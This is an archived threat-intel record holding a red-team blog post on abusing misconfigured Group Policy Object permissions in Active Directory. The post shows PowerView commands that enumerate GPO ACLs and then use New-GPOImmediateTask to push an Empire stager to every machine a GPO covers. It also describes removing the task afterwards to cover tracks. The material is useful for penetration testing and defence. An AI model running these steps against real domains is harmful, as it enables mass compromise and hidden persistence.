{
	"id": "78e94ad0-bc8a-4321-9798-8c38e654cdc6",
	"created_at": "2026-04-06T00:19:34.111889Z",
	"updated_at": "2026-04-10T03:20:43.366432Z",
	"deleted_at": null,
	"sha1_hash": "69b0ca047d03f09082181dab17a899fb2dd605cb",
	"title": "Abusing GPO Permissions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 650484,
	"plain_text": "Abusing GPO Permissions\r\nPublished: 2016-03-17 · Archived: 2026-04-05 15:16:49 UTC\r\nA friend (@piffd0s) recently ran into a specific situation I hadn’t encountered before: the domain controllers and\r\ndomain admins of the environment he was assessing were extremely locked down, but he was able to determine\r\nthat a few users had edit rights on a few specific group policy objects (GPOs). After a bit of back and forth, he was\r\nable to abuse this to take down his target, and we were able to integrate some new functionality into\r\nPowerView that facilitates this process.\r\nThis post will cover these new features and demonstrate how to enumerate and abuse misconfigured GPOs in case\r\nyou encounter a similar situation. I also covered a bit of this material in my recent Troopers16 presentation “I\r\nHave the Power(View): Offensive Active Directory with PowerShell“. Sidenote: I can’t say enough good things\r\nabout Troopers– if you haven’t been I definitely recommend checking it out! Also, this new functionality is in the\r\ndevelopment branch of PowerSploit and should be merged into master soon(ish).\r\nGPO Background\r\nGroup Policy Objects are Active Directory containers used to store groupings of policy settings. These objects are\r\nthen linked to specific sites, domains, or most commonly specific organizational units (OUs). According to\r\nMicrosoft, “By default, computer Group Policy is updated in the background every 90 minutes, with a random\r\noffset of 0 to 30 minutes.“, which forces the application of specific settings to any machines in an OU/site where\r\nthe GPO is linked. Sean Metcalf also just posted a great article explaining GPOs from an offensive\r\nperspective, which I highly recommend reading.\r\nWith PowerView, the Get-NetGPO cmdlet allows for the easy enumeration of all current GPOs in a given\r\ndomain. We can also easily figure out what OUs a policy is applied to by searching for a the GPO GUID in the\r\ngPLink attribute of any OU objects (this also works with Get-NetSite). We can then track this back to specific\r\ncomputers, as the “GPP and PowerView” post demonstrated. If we want to go the opposite direction and\r\ndetermine what GPOs a specific computer has applied, we can feed Get-NetGPO the -\r\nComputerName COMPUTER argument, and all GPOs for the target system (applied by OU or site) will be\r\nreturned:\r\nhttps://blog.harmj0y.net/redteaming/abusing-gpo-permissions/\r\nPage 1 of 5\n\nThe gpcfilesyspath field shows you where the configuration for the policy resides. All of this will matter shortly-the key here is to be able to quickly find the GPOs that apply to specific machines (starting from either the GPO\r\nname or the machine name) and where the actual GPO configuration files reside.\r\nEnumerating GPO Permissions\r\nI covered some similar information in my “Abusing Active Directory Permissions with PowerView” post, but I’ll\r\nreiterate a bit here. Active Directory objects (like files) have permissions associated with them. These can\r\nsometimes be misconfigured, and can also be backdoored for persistence (as shown in the abuse post). This\r\nincludes GPOs. The key PowerView function we can use here for enumeration is Get-ObjectAcl.\r\nLet’s enumerate all the permissions for all GPOs in the current domain:\r\nGet-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}\r\nNote: you can also use PowerView’s Invoke-ACLScanner to speed up your search. This will search the ACLs for\r\nALL domain objects, and returns results where the IdentityReference RID is -1000 or above and also has some\r\ntimes of modification rights on the given object.\r\nEither way, you will get a big chunk of data, with most of the entries likely being groups like Enterprise and\r\nDomain Admins. Here’s what a misconfiguration might look like:\r\nhttps://blog.harmj0y.net/redteaming/abusing-gpo-permissions/\r\nPage 2 of 5\n\nAnd here’s how that misconfiguration looks through the Group Policy Management console:\r\nSo the ‘TESTLAB\\will’ user has modification rights on the GPO with the GUID of “{3EE4BE4E-7397-4433-\r\nA9F1-3A5AE2F56EA2}” and display name of “SecurePolicy”. Let’s track this back and see what systems this\r\nGPO is applied to:\r\nSo now we now know the specific policy our user can edit and the machines this policy is applied to. And\r\nwith edit rights to the GPO, we can force code execution on these machines!\r\nWeaponizing GPO Edit Rights\r\nGroup Policy has a huge number of settings to manipulate, giving you a few ways to go about compromising\r\nmachines/users touched by a compromised GPO. You could push out specific startup scripts, backdoor Internet\r\nExplorer settings, push out a .MSI under ‘Software installation’, add your domain account to the local\r\nhttps://blog.harmj0y.net/redteaming/abusing-gpo-permissions/\r\nPage 3 of 5\n\nadministrators/RDP group, force the mounting of a network share (where you control the endpoint and can relay\r\nany specific credentials), or several other approaches I’m sure I’m not realizing.\r\nMy preference for immediate code execution would be to push out an ‘Immediate’ Scheduled task, which instantly\r\nruns and then removes itself, every time group policy refreshes. This part is pretty simple- we just need to build a\r\nschtask .XML template to substitute in our appropriate configuration/commands and then copy it to\r\n\u003cGPO_PATH\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml of the GPO we can edit. After waiting\r\n1-2 hours for the group policy refresh cycle, we can remove the .xml to minimize our footprint.\r\nPowerView’s new New-GPOImmediateTask function should take care of all this for you. The -TaskName\r\nargument is required, -Command specified the command to run (which defaults to powershell.exe), and -\r\nCommandArguments specifies the arguments for the given binary. The task description, author, and modification\r\ndate can also optionally be modified with the appropriate parameters. A schtask .xml is built according to your\r\nspecifications and is copied to the appropriate location determined by the -GPOname or -GPODisplayname\r\narguments. By default the function will prompt you before copying, but this can be suppressed with -Force.\r\nFor example, let’s use New-GPOImmediateTask to push an Empire stager out to machines where this\r\n‘{3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2}’ GPO (display name of ‘SecurePolicy’) is applied:\r\nNew-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-NoP -NonI -\r\nhttps://blog.harmj0y.net/redteaming/abusing-gpo-permissions/\r\nPage 4 of 5\n\nYou can remove the schtask .xml after you get execution by supplying the -Remove flag:\r\nNew-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy\r\nHave fun!\r\nSource: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/\r\nhttps://blog.harmj0y.net/redteaming/abusing-gpo-permissions/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/"
	],
	"report_names": [
		"abusing-gpo-permissions"
	],
	"threat_actors": [],
	"ts_created_at": 1775434774,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/69b0ca047d03f09082181dab17a899fb2dd605cb.pdf",
		"text": "https://archive.orkl.eu/69b0ca047d03f09082181dab17a899fb2dd605cb.txt",
		"img": "https://archive.orkl.eu/69b0ca047d03f09082181dab17a899fb2dd605cb.jpg"
	}
}